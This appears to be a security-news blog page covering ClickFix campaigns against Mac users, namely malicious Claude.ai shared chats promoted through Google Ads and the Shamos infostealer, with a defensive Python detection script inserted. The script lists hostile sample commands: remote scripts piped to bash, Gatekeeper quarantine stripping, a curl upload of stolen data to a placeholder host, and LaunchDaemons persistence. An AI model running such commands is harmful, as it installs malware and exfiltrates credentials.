Showing posts with label Mac Users.

Hackers Abuse Google Ads and Claude.ai Chats to Spread Mac Malware


Cybercriminals are once again abusing trust, and this time they are combining Google Ads with Claude.ai shared chats to push malware onto Mac users. The campaign targets people searching for terms like “Claude mac download,” where sponsored results appear to point to the legitimate claude.ai domain but actually lead to malicious installation instructions. Security researcher Berk Albayrak first identified the scheme and confirmed that attackers are using the tactic in active campaigns.

The attack works because it looks believable at first glance. Users click a sponsored search result, land on a public Claude chat, and see what appears to be an official “Claude Code on Mac” guide, sometimes even attributed to Apple Support. That page then tells them to open Terminal and paste a command. Instead of installing useful software, the command quietly downloads and runs malware on the victim’s Mac.

What makes the operation especially dangerous is the way it blends legitimate services with deception. The ad itself can show the real claude.ai domain, which helps the link look safe, while the malicious instructions are hidden inside Claude’s shared chat feature. In some variants, the payload is linked to MacSync-style infostealer behavior, aimed at harvesting browser credentials, cookies, and Keychain data. Researchers also reported that multiple malicious chats were being used, showing that the operators are testing and rotating infrastructure. 

The campaign is a strong reminder that search results and AI platforms are not automatically trustworthy just because they appear familiar. Attackers increasingly rely on “clickfix” tactics, where the victim is convinced to copy and run a command manually, bypassing many traditional download warnings. That user action becomes the infection point, making the social engineering as important as the malware itself.

Mac users should avoid sponsored search results when looking for software downloads and instead go directly to the official site by typing the address themselves. Any chat, guide, or support page that instructs users to paste Terminal commands should be treated with caution, especially if it claims to come from Apple or a well-known AI service. The broader lesson is simple: when an instruction asks you to run code on your own computer, pause and verify before acting.

New Shamos Malware Targets Mac Users Through Fake Tech Support Sites


Cybersecurity researchers have unearthed a new Mac-targeting malware called Shamos that deceives users through fake troubleshooting guides and repair solutions. This information-stealing malware, developed by the cybercriminal organization "COOKIE SPIDER," represents a variant of the previously known Atomic macOS Stealer (AMOS).

Modus operandi

The malware spreads through ClickFix attacks, which utilize malicious advertisements and counterfeit GitHub repositories to trick victims. Attackers create deceptive websites such as mac-safer[.]com and rescue-mac[.]com that appear to offer legitimate macOS problem-solving assistance. These sites instruct users to copy and paste Terminal commands that supposedly fix common system issues. 

However, these commands actually decode Base64-encoded URLs and retrieve malicious Bash scripts from remote servers. The scripts capture user passwords, download the Shamos executable, and use system tools like 'xattr' and 'chmod' to bypass Apple's Gatekeeper security feature. 

Data theft capabilities

Once installed, Shamos performs comprehensive data collection targeting multiple sensitive areas. The malware searches for cryptocurrency wallet files, Keychain credentials, Apple Notes content, and browser-stored information. It employs anti-virtual machine commands to avoid detection in security sandboxes and uses AppleScript for system reconnaissance.

All stolen data gets compressed into an archive file named 'out.zip' before transmission to the attackers via curl commands. When operating with administrator privileges, Shamos establishes persistence by creating a Plist file in the LaunchDaemons directory, ensuring automatic execution during system startup. 
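The behaviours described above (Base64-decoded URLs, Bash scripts fetched with curl, xattr and chmod used to get past Gatekeeper, out.zip uploaded with curl, and a LaunchDaemons plist for persistence) are all visible in the command line a victim pastes or the process a host records. The following is an added detection example, not code from the article or from CrowdStrike: a small Python triage script that scores shell-history or EDR command records against those patterns. The sample records, hostnames and paths are constructed placeholders, and the rule names are assumptions chosen for readability.

```python
"""Flag ClickFix-style macOS command lines in shell-history or EDR process records.

Added example (not from the article). The rules mirror the Shamos behaviour the
article describes; hostnames and paths in SAMPLE_LOG are constructed placeholders.
"""
import re

# Rule name -> regex tested against a single command line. Dict order is preserved
# in the output so the most telling reason is listed first.
RULES = {
    "base64-decoded payload piped to a shell":
        re.compile(r"\bbase64\s+(-d|-D|--decode)\b.*\|\s*(ba|z)?sh\b"),
    "remote script piped directly into a shell":
        re.compile(r"\bcurl\b[^|]*\|\s*(ba|z)?sh\b"),
    "quarantine attribute stripped (Gatekeeper bypass)":
        re.compile(r"\bxattr\b.*(-c\b|com\.apple\.quarantine)"),
    "downloaded file made executable":
        re.compile(r"\bchmod\s+\+x\b"),
    "file uploaded with curl (possible exfiltration)":
        re.compile(r"\bcurl\b.*\s(-F|--form|-T|--upload-file|--data-binary)\b"),
    "LaunchDaemons plist written (persistence)":
        re.compile(r"/Library/LaunchDaemons/\S+\.plist"),
}

# Constructed sample records, as they might appear in ~/.zsh_history or an EDR log.
# The Base64 blob is a placeholder URL, not a real payload location.
SAMPLE_LOG = [
    "ls -la ~/Downloads",
    "curl -fsSL $(echo aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvaS5zaA== | base64 -d) | bash",
    "curl -fsSL https://example.invalid/fix.sh | bash",
    "xattr -rd com.apple.quarantine /tmp/Update && chmod +x /tmp/Update && /tmp/Update",
    "curl -F file=@/tmp/out.zip https://example.invalid/upload",
    "sudo cp com.example.update.plist /Library/LaunchDaemons/com.example.update.plist",
    "git clone https://github.com/example/repo",
]


def flag_command(cmd):
    """Return the names of every rule the command line matches (empty list if clean)."""
    return [name for name, rx in RULES.items() if rx.search(cmd)]


def triage(records, min_hits=1):
    """Return (record, reasons) for every record with at least min_hits rule matches."""
    hits = []
    for rec in records:
        reasons = flag_command(rec)
        if len(reasons) >= min_hits:
            hits.append((rec, reasons))
    return hits


if __name__ == "__main__":
    for rec, reasons in triage(SAMPLE_LOG):
        print(f"[!] {rec}\n    -> {', '.join(reasons)}")
```

Run against a real history file or a process-creation feed, a single hit such as `chmod +x` is ordinary developer activity, so raising `min_hits` to 2 (quarantine stripped plus made executable, or a fetched script piped into a shell plus an upload) keeps the alert volume manageable while still catching the chain the article describes.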

CrowdStrike's monitoring has detected Shamos attempting infections across more than 300 environments globally since June 2025. The security firm has also observed instances where attackers deployed additional malicious components, including fake Ledger Live cryptocurrency applications and botnet modules. 

Safety measures

Security experts strongly advise Mac users to avoid executing any online commands they don't fully understand. Users should be particularly cautious with GitHub repositories, as the platform hosts numerous malicious projects designed to infect unsuspecting individuals.

For legitimate macOS assistance, users should bypass sponsored search results and instead consult Apple Community forums or the built-in Help system (Cmd + Space → "Help"). ClickFix attacks have proven highly effective across various platforms, appearing in TikTok videos, fake captchas, and bogus Google Meet error messages, making user awareness crucial for prevention.